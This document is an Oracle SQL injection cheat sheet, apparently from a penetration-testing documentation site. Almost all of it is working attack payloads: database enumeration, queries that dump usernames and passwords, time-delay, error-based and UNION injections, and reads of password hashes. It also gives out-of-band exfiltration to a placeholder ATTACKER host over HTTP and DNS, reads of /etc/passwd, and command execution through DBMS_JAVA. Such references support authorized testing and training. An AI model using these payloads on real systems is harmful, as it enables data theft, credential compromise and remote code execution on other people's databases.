Documentation Index
Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
Use this file to discover all available pages before exploring further.
Identification
SELECT banner FROM v$version
SELECT version FROM v$instance
-- Comment: -- or /* */
-- String concat: 'a'||'b'
-- Every SELECT needs FROM → use FROM dual
SELECT user FROM dual
SELECT ora_database_name FROM dual
SELECT SYS_CONTEXT('USERENV','DB_NAME') FROM dual
SELECT SYS_CONTEXT('USERENV','HOST') FROM dual
SELECT SYS_CONTEXT('USERENV','IP_ADDRESS') FROM dual
Enumerate Tables
SELECT table_name FROM all_tables
SELECT table_name FROM user_tables
SELECT table_name FROM all_tables WHERE owner='SCHEMA'
Enumerate Columns
SELECT column_name FROM all_tab_columns WHERE table_name='USERS'
SELECT column_name FROM user_tab_columns WHERE table_name='USERS'
Oracle table/column names are case-sensitive and typically uppercase.
Dump Data
SELECT username||':'||password FROM users
SELECT LISTAGG(username||':'||password, ',') WITHIN GROUP (ORDER BY username) FROM users
String Functions
| Function | Description |
|---|
|| | Concatenate |
SUBSTR(str,pos,len) | Substring |
LENGTH(str) | String length |
ASCII(char) | ASCII value |
CHR(n) | Char from ASCII |
UPPER(str) | Uppercase |
LOWER(str) | Lowercase |
REPLACE(str,old,new) | Replace |
INSTR(str,sub) | Find substring position |
TRIM(str) | Trim whitespace |
TO_CHAR(n) | Number to string |
RAWTOHEX(str) | Hex encode |
Conditional
CASE WHEN condition THEN true_val ELSE false_val END
DECODE(expr, search, result, default)
Time Delay
DBMS_PIPE.RECEIVE_MESSAGE('a', 5) -- 5 sec delay
-- In WHERE clause:
AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5)
-- Via heavy query (no privileges needed):
AND (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3) > 0
Error-Based
UTL_INADDR.GET_HOST_ADDRESS((QUERY))
CTXSYS.DRITHSX.SN(1,(QUERY))
UNION Specifics
Oracle requires:
- Same number of columns
- Compatible types
FROM dual for dummy values
' UNION SELECT NULL,NULL,NULL FROM dual-- -
' UNION SELECT username,password,NULL FROM users-- -
OOB — HTTP
SELECT UTL_HTTP.REQUEST('http://ATTACKER/?d='||(SELECT user FROM dual)) FROM dual
SELECT HTTPURITYPE('http://ATTACKER/?d='||(SELECT user FROM dual)).GETCLOB() FROM dual
OOB — DNS
SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT user FROM dual)||'.ATTACKER.com') FROM dual
File Read
-- Via UTL_FILE (needs directory object)
CREATE DIRECTORY ext AS '/etc';
SELECT UTL_FILE.FOPEN('EXT','passwd','r') FROM dual;
Java (If Enabled)
SELECT DBMS_JAVA.RUNJAVA('oracle.aurora.util.Wrapper /bin/cat /etc/passwd') FROM dual
RCE — Java
-- Requires CREATE PROCEDURE + JAVA privileges
SELECT DBMS_JAVA.RUNJAVA('oracle.aurora.util.Wrapper /bin/id') FROM dual
No LIMIT — Use ROWNUM
SELECT * FROM (SELECT username, ROWNUM r FROM users) WHERE r=1 -- First row
SELECT * FROM (SELECT username, ROWNUM r FROM users) WHERE r=2 -- Second row
Password Hashes
SELECT name, password FROM sys.user$ -- DBA only
SELECT username, password FROM dba_users -- DBA only
Stacked Queries
Not supported via standard SQL injection (semicolons don’t work in Oracle injection context).
Privileges
SELECT * FROM session_privs
SELECT * FROM user_role_privs
SELECT * FROM dba_sys_privs WHERE grantee='USER'
Sources